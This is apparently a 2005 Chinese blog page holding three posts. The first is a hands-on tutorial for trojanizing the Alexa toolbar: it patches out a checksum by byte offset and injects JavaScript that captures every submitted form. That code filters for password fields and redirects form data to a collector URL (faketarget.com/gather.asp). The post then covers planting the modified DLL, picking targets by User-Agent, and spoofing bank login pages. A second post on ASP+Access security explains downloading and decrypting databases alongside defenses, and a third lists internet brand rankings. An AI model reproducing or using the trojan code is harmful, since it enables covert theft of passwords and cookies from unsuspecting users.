Alexa是一个发布全球网站排名信息的网站,他的网址是http://www.alexa.com。Alexa通过在客户端安装Alexa工具条来收集采样全球网站的访问数据,以这些数据为依据对全球网站进行排名,类似于电视收视率的统计。Alexa工具条是一种类似于Google工具条的IE插件,你可以在下面URL中下载:http://download.alexa.com/index.cgi。
一、Alexa工具条的工作原理
Alexa工具条是一种基于BHO和Toolbar Bands技术的一种IE插件。它以DLL文件的形式存在于系统中,是一种COM组件,IE会在运行时将其加载到自身进程中去,所以一般情况下防火墙是无法禁止该软件访问网络的,这就为他的木马角色提供了先天的便利,而且比本机Sniff软件收集密码的优势是:无论是HTTP还是HTTPS的网站,不管通信通道是否加密,只要是IE页面的表单都能收集到。具体原理可以查阅《关于Alexa排名作弊的一些解惑》。
系统在安装了Alexa工具条后,会在系统目录下生成AlxTB1.dll和AlxRes.dll两个DLL文件(有些情况下是AlxTB2.dll,而不是AlxTB1.dll。那是因为Alexa工具条会自动上网更新的原因)。Alexa工具条的主要二进制代码存在于AlxTB1.dll文件中,这个文件同时也被注册成多个COM组件,他完成了BHO和Toolbar Bands的COM接口,并将IE的WebBrowser控件封装为一个COM组件供AlxRes.dll调用。AlxRes.dll文件仅包含少量的二进制代码,大量的代码是HTML和javascript代码,他们以资源的形式存在于AlxRes.dll文件中,你可以通过res://AlxRes.dll/CHTML/about.html这样的URL来访问这些资源。也许你会奇怪:又不是做网站,为什么软件的代码会是javascript写的?这就是Alexa工具条垃圾的地方。Alexa工具条的主界面是由HTML+javascript实现的。这些javascript代码通过调用AlxTB1.dll实现的COM接口来实现软件的全部功能。这样做不仅导致软件的效率低下,而且产生大量的资源泄漏,绝对是一种VERY超级SB的开发模式,但是却为我们修改Alexa工具条的功能提供了方便——根本不需要CRACKER知识,只要一个PE资源修改工具就可以对Alexa工具条的代码进行修改了。
二、破解Alexa工具条
当然,Alexa也不是真傻,绝对不会蠢到让自己的代码被你用资源修改工具随便改。为了防止AlxRes.dll中的资源被随意修改,他采取了计算文件校验和的保护方法,要是发现文件被修改,就会拒绝加载。我们在修改代码前,必须破解这种保护机制。
AlxTB1.dll导出一个名叫ChecksumResources的函数,这个函数就是用来计算文件校验和的。用c32asm反汇编AlxRes.dll文件,查看字符串调用列表,找到”ChecksumResources”字符串,跳转到调用该字符串的代码,于100017C0处。往下翻几行,在100017F6处找到一句跳转,采用爆破方式,用NOP指令覆盖JNZ指令即可。通俗点讲:就是将AlxRes.dll文件偏移”0x17F6″处的两个字节”75 11″改成”90 90″,你可以使用WinHex之类的16进制编辑软件来修改。
::100017C0:: 68 9C700010 PUSH 1000709C \:BYJMP JmpBy:100017A4,100017B1, \->: ChecksumResources
::100017C5:: 57 PUSH EDI
::100017C6:: FF15 1C500010 CALL [1000501C] >>>: KERNEL32.DLL:GetProcAddress
::100017CC:: 85C0 TEST EAX, EAX
::100017CE:: 74 0E JE SHORT 100017DE \:JMPDOWN
::100017D0:: 8D4D DC LEA ECX, [EBP-24]
::100017D3:: 51 PUSH ECX
::100017D4:: FF35 44740010 PUSH DWORD PTR [10007444]
::100017DA:: FFD0 CALL EAX
::100017DC:: 59 POP ECX
::100017DD:: 59 POP ECX
::100017DE:: 57 PUSH EDI \:BYJMP JmpBy:100017CE,
::100017DF:: FF15 18500010 CALL [10005018] >>>: KERNEL32.DLL:FreeLibrary
::100017E5:: 8D45 B8 LEA EAX, [EBP-48]
::100017E8:: 50 PUSH EAX
::100017E9:: 8D45 DC LEA EAX, [EBP-24]
::100017EC:: 50 PUSH EAX
::100017ED:: E8 AE060000 CALL 10001EA0 \:JMPDOWN
::100017F2:: 59 POP ECX
::100017F3:: 85C0 TEST EAX, EAX
::100017F5:: 59 POP ECX
::100017F6:: 75 11 JNZ SHORT 10001809 \:JMPDOWN ;就是修改这里
现在我们可以毫无顾忌的修改AlxRes.dll中的资源了。
三、修改Alexa工具条的代码
熟悉IE编程的人都知道,DWebBrowserEvents2接口是用来接收WebBrowser的事件通知的,我们可以在AlxRes.dll的javascript代码中找到这些些对应的函数。在res://AlxRes.dll/SCRIPT/EVT.CLASS.JS的代码中,有一系列的javascript函数,对应于DWebBrowserEvents2接口的成员,如:DocumentComplete->BP_onDocumentComplete,NavigateComplete2->BP_onNavigateComplete,BeforeNavigate2->BP_onBeforeNavigate。按照DWebBrowserEvents2接口,我们可以在BeforeNavigate2中截获PostData,但是在AlxRes.dll的代码中,这个接口没有完全实现。在DWebBrowserEvents2接口中的原型是:
void BeforeNavigate2(IDispatch *pDisp,
VARIANT *&url,
VARIANT *&Flags,
VARIANT *&TargetFrameName,
VARIANT *&PostData,
VARIANT *&Headers,
VARIANT_BOOL *&Cancel
);
这其中的PostData包含了的Post数据。而BP_onBeforeNavigate的函数原型:
function BP_onBeforeNavigate(oParentWebBrowser2, oWebBrowser2, sURL, bPostData, sHeaders);
其中,bPostData只是个BOOL类型的变量。此路不通,必须另想办法。
一般来说,我们在IE中输入的用户名密码都是通过表单提交到服务器的,如果能在表单提交前截获表单的内容就可以实现窃取密码了。在javascript中,只要处理表单的”OnSubmit”事件,就可以先于提交而处理表单的内容。而AlxRes.dll的功能也是由javascript实现的,所以我们就无需面对繁琐的COM接口,而直接使用javascript了。
这里我推荐使用Resource Hacker来修改AlexRes.dll中的资源,个人感觉比eXeScope用起来爽多了。
四、截获网页表单的内容
我现在使用的方法有些类似于”跨站点脚本执行漏洞”。先来看看”res://AlxRes.dll/SCRIPT/EVT.CLASS.JS”中的”BP_onDocumentComplete”函数:
function BP_onDocumentComplete(oParentWebBrowser2, oWebBrowser2, sURL);
该函数在IE的当前浏览页面被加载完成时被调用,其中的 oWebBrowser2 参数可以当作当前IE正在浏览的页面的window对象。如果你懂得javascript的话,接下来要做的事情就十分简单了。添加如下代码:
function BP_onDocumentComplete(oParentWebBrowser2, oWebBrowser2, sURL) {
… …
try{
for(i=0;i<oWebBrowser2.document.forms.length;i++)
{
oWebBrowser2.document.forms[i].onsubmit=test;
}
}catch(e){}
return false;
}
这段代码的作用就是枚举当前页面中所有的表单对象,并为这些表单定义OnSubmit事件。接下来就是完成test函数了:
function test()
{
try{
window.alert(“I can get the value!”);
for(i=0;i<this.length;i++)
{
if(this.elements[i].name!=”")
{
window.alert(this.elements[i].name+”:”+this.elements[i].value);
//do some thing
}
}
}catch(e){}
return true;
}
不过用这种方法存在一点弊端:当表单是通过javascript语句”Submit()”提交时,不会产生”OnSubmit”事件,上面的代码也就无法纪录下表单的内容了。可以采用改变表单提交地址的方法来解决这个问题:
function BP_onDocumentComplete(oParentWebBrowser2, oWebBrowser2, sURL) {
… …
try{
{
oWebBrowser2.document.forms[i].innerHTML=oWebBrowser2.document.forms[i].innerHTML+”<input name=OriginalAction type=hidden value=’”+oWebBrowser2.document.forms[i].action+”’>”;
oWebBrowser2.document.forms[i].action=”http://www.faketarget.com/gather.asp”;
}
}catch(e){}
return false;
}
以上的代码对于某些页面存在问题,有时会无法将隐藏字段添加到表单中去。
五、散布和植入木马
以上代码均是用PE资源软件修改AlxRes.dll文件实现的。所以,只要用新的AlxRes.dll文件将原来系统的AlxRes.dll替换掉。Alexa工具条在加载的时候会优先在”C:\Program Files\Internet Explorer”和”C:\Documents and Settings\[username]\桌面”这两个路径下搜索AlxRes.dll,所以也可以把修改过的AlxRes.dll放到这两个路径下,这样就不用覆盖源文件了。至于怎么安装,那可是有一大堆的IE漏洞等着你去Exploit呢,这可不是本文涉及的范围。
安装了Alexa工具条的IE的”User-Agent”会加入”Alexa Toolbar”的标记,所以很容易区分目标的IE是否已经安装了Alexa工具条:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toobar)
也可以修改Alexa的安装文件,或者以Alexa补丁的名义来发布,这个就扯远了。
六、收集密码
你可以用FileSystemObject控件来将表单内容纪录到文件,或者直接作为参数发送到某个Web服务器,由web服务器收集纪录下来即可。为了在客户端过滤一些不包含密码的表单,最好在AlxRes.dll的代码中对收集的表单数据进行一些检查:
function test()
{
var IsPwdForm=false;
var FormStr;
try{
for(i=0;i<this.length;i++)
{
if(this.elements[i].name!=”")
{
if(this.elements[i].type==”password”)
IsPwdForm=true;
FormStr=FormStr+this.elements[i].name+”=”+this.elements[i].value+”&”;
}
}
if(IsPwdForm)
{
//表单包含密码文本,进行收集
}
}catch(e){}
return true;
}
七、其他的应用
大多数的网上银行登陆界面是由ActiveX控件实现的,无法截获表单数据,但是我们可以通过”oWebBrowser2″对象来操纵、修改浏览的页面,当然也可以伪造一个网上银行的登陆界面。还可以用来收集用户浏览网页的纪录,也可以用来窃取用户COOKIE等。
分类 : 网站技术 | 发表时间 29-12-2005
随着Internet的发展,Web技术日新月异。继通用网关接口(CGI)之后,“ASP”(Active Server Pages)作为一种典型的服务器端网页设计技术,被广泛地应用在网上银行、电子商务、搜索引擎等各种互联网应用中。同时Access数据库作为微软推出的以标准JET为引擎的桌面型数据库系统,由于具有操作简单、界面友好等特点,具有较大的用户群体。因此ASP+Access成为许多中小型网上应用系统的首选方案。但ASP+Access解决方案在为我们带来便捷的同时,也带来了不容忽视的安全问题。
ASP+Access的安全隐患
ASP+Access解决方案的主要安全隐患来自Access数据库的安全性,其次在于ASP网页设计过程中的安全漏洞。
1、Access数据库的存储隐患
在ASP+Access应用系统中,如果获得或者猜到Access数据库的存储路径和数据库名,则该数据库就可以被下载到本地。例如:对于网上书店的Access数据库,人们一般命名为book.mdb、store.mdb等,而存储的路径一般为“URL/database”或干脆放在根目录(“URL/”)下。这样,只要在浏览器地址栏中敲入地址:“URL/database/store.mdb”,就可以轻易地把store.mdb下载到本地的机器中。
2、Access数据库的解密隐患
由于Access数据库的加密机制非常简单,所以即使数据库设置了密码,解密也很容易。该数据库系统通过将用户输入的密码与某一固定密钥进行异或来形成一个加密串,并将其存储在*.mdb文件中从地址“&H42”开始的区域内。由于异或操作的特点是“经过两次异或就恢复原值”,因此,用这一密钥与*.mdb文件中的加密串进行第二次异或操作,就可以轻松地得到Access数据库的密码。基于这种原理,可以很容易地编制出解密程序。
由此可见,无论是否设置了数据库密码,只要数据库被下载,其信息就没有任何安全性可言了。
3、源代码的安全隐患
由于ASP程序采用的是非编译性语言,这大大降低了程序源代码的安全性。任何人只要进入站点,就可以获得源代码,从而造成ASP应用程序源代码的泄露。
4、程序设计中的安全隐患
ASP代码利用表单(form)实现与用户交互的功能,而相应的内容会反映在浏览器的地址栏中,如果不采用适当的安全措施,只要记下这些内容,就可以绕过验证直接进入某一页面。例如在浏览器中敲入“……page.asp?x=1”,即可不经过表单页面直接进入满足“x=1”条件的页面。因此,在设计验证或注册页面时,必须采取特殊措施来避免此类问题的发生。
提高数据库的安全性
由于Access数据库加密机制过于简单,因此,如何有效地防止Access数据库被下载,就成了提高ASP+Access解决方案安全性的重中之重。
1、非常规命名法
防止数据库被找到的简便方法是为Access数据库文件起一个复杂的非常规名字,并把它存放在多层目录下。例如,对于网上书店的数据库文件,不要简单地命名为“book.mdb”或“store.mdb”,而是要起个非常规的名字,例如:faq19jhsvzbal.mdb,再把它放在如./akkjj16t/kjhgb661/acd/avccx55 之类的深层目录下。这样,对于一些通过猜的方式得到Access数据库文件名的非法访问方法起到了有效的阻止作用。
2、使用ODBC数据源
在ASP程序设计中,应尽量使用ODBC数据源,不要把数据库名直接写在程序中,否则,数据库名将随ASP源代码的失密而一同失密。例如:
DBPath = Server.MapPath(“./akkjj16t/
kjhgb661/acd/avccx55/faq19jhsvzbal.mdb ”)
conn.Open “driver={Microsoft Access Driver (*.mdb)};dbq=” & DBPath
可见,即使数据库名字起得再怪异,隐藏的目录再深,ASP源代码失密后,数据库也很容易被下载下来。如果使用ODBC数据源,就不会存在这样的问题了:
conn.open “ODBC-DSN名”
对ASP页面进行加密
为有效地防止ASP源代码泄露,可以对ASP页面进行加密。一般有两种方法对ASP页面进行加密。一种是使用组件技术将编程逻辑封装入DLL之中;另一种是使用微软的Script Encoder对ASP页面进行加密。笔者认为,使用组件技术存在的主要问题是每段代码均需组件化,操作比较烦琐,工作量较大;而使用Script Encoder对ASP页面进行加密,操作简单、收效良好。Script Encoder方法具有许多优点:
1、HTML仍具有很好的可编辑性。Script Encoder只加密在HTML页面中嵌入的ASP代码,其他部分仍保持不变,这就使得我们仍然可以使用FrontPage或Dreamweaver等常用网页编辑工具对HTML部分进行修改、完善,只是不能对ASP加密部分进行修改,否则将导致文件失效。
2、操作简单。只要掌握几个命令行参数即可。Script Encoder的运行程序是screnc.exe,其使用方法如下:
screnc [/s] [/f] [/xl] [/l defLanguage ] [/e defExtension] inputfile outputfile
其中的参数含义如下:
s:屏蔽屏幕输出;
f:指定输出文件是否覆盖同名输入文件;
xl:是否在.asp文件的顶部添加@Language指令;
l:defLanguag指定缺省的脚本语言;
e:defExtension 指定待加密文件的扩展名。
3、可以批量加密文件。使用Script Encoder可以对当前目录中的所有的ASP 文件进行加密,并把加密后的文件统一输出到相应的目录中。例如:
screnc *.asp c: emp
4、Script Encoder是免费软件。该加密软件可以从微软网站下载:http://msdn.microsoft.com/scripting/vbscript/download/x86/sce10en.exe。下载后,运行安装即可。
利用Session对象进行注册验证
为防止未经注册的用户绕过注册界面直接进入应用系统,可以采用Session对象进行注册验证。Session对象最大的优点是可以把某用户的信息保留下来,让后续的网页读取。例如,要设计如图1所示的注册页面。
[sayyes]http://www.computerworld.com.cn/htm/app/aprog/01_7_13_2.jpg[/sayyes]
设计要求用户注册成功后系统启动hrmis.asp?page=1页面。如果不采用Session对象进行注册验证,则用户在浏览器中敲入“URL/hrmis.asp?page=1”即可绕过注册界面,直接进入系统。利用Session对象可以有效阻止这一情况的发生。相关的程序代码如下:
<%
’ 读取用户输入的账号和密码
UserID = Request(“UserID”)
Password = Request(“Password”)
’ 检查UserID 及Password 是否正确(实际程序可能会比较复杂)
If UserID <>“hrmis” Or Password <>
“password” Then
Response.Write “账号错误!”
Response.End
End If
’将Session 对象设置为通过验证状态
Session(“Passed”) = True
%>
进入应用程序后,首先进行验证:
<%
’如果未通过验证,返回Login状态
If Not Session(“Passed”) Then
Response.Redirect “Login.asp”
End If
%>
分类 : 网络日志 | 发表时间 26-12-2005
新浪科技讯 12月22日下午,《2005~2006中国互联网产业调查报告》正式发布,中国互联网首次“品牌50强”、“创新50强”正式诞生。
以下为05-06年度中国互联网产业调查品牌50强(TOP50)名单:
2005-2006年度中国互联网产业调查品牌50强(TOP50)
1 门户网站 第一名 新浪
2 搜索引擎 第一名 百度
3 即时通讯 第一名 腾讯QQ
4 电子邮件服务 第一名 网易
5 本地化综合资讯服务 第一名 上海热线
6房地产网站 第一名 搜房网
7 财经网站 第一名 新浪财经
8 汽车网站 第一名 新浪汽车
9 新闻网站 第一名 新浪新闻
10 信息科技网站 第一名 天极网
11 C2C网上购物 第一名 淘宝网
12 B2C网上购物 第一名 当当网
13 B2B电子商务 第一名 阿里巴巴
14 网上银行 第一名 中国工商银行
15 电子支付 第一名 支付宝
16 人才招聘网站 第一名 前程无忧网
17 交友网站 第一名 腾讯QQ交友
18 游戏资讯服务网站 第一名 搜狐17173
19 游戏运营服务 第一名 腾讯QQ游戏运营
20 综合音乐网站 第一名 A8音乐
21 音乐搜索服务 第一名 百度音乐搜索
22 在线影视网站 第一名 互联星空
23 女性网站 第一名 瑞丽女性网
24 健康网站 第一名 三九健康网
25 教育网站 第一名 搜狐教育
26 娱乐网站 第一名 新浪娱乐
27 体育运动网站 第一名 新浪体育
28 文学网站 第一名 榕树下
29 艺术设计类网站 第一名 中国摄影在线
30 网址导航服务 第一名 HAO123
31 软件下载服务 第一名 华军软件园
32 P2P服务 第一名 BTChina
33 教程资料服务 第一名 洪恩在线
34 广告联盟服务 第一名 好耶广告网
35 网上黄页服务 第一名 中国网上黄页
36 地图信息服务 第一名 百度地图搜索
37 博客网站 第一名 博客网
38 SMS(短信)服务 第一名 新浪
39 MMS(彩信/彩e)服务 第一名 空中网
40 手机WAP站点 第一名 移动梦网
41 彩铃服务 第一名 新浪
42 声讯(IVR)语音服务 第一名 TOM雷霆无极
43 手机游戏的提供商 第一名 空中网
44 域名主机服务 第一名 中国万网
45 互联网接入 第一名 中国网通
46 网络安全产品服务 第一名 瑞星
47 IP电话服务 第一名 中国电信
48 旅行预订网站 第一名 e龙网
49 动漫卡通网站 第一名 闪客帝国
50 综合社区 第一名 猫扑
注:此项调查由中国互联网协会主办,赛迪顾问、IDC中国、艾瑞咨询、易观国际四家协办,通过网上、邮件及电话的调查方式,由包括150位专家的顾问小组论证产生。其中50个细分领域使用频率第一名的互联网企业自动成为品牌50强(TOP50)。
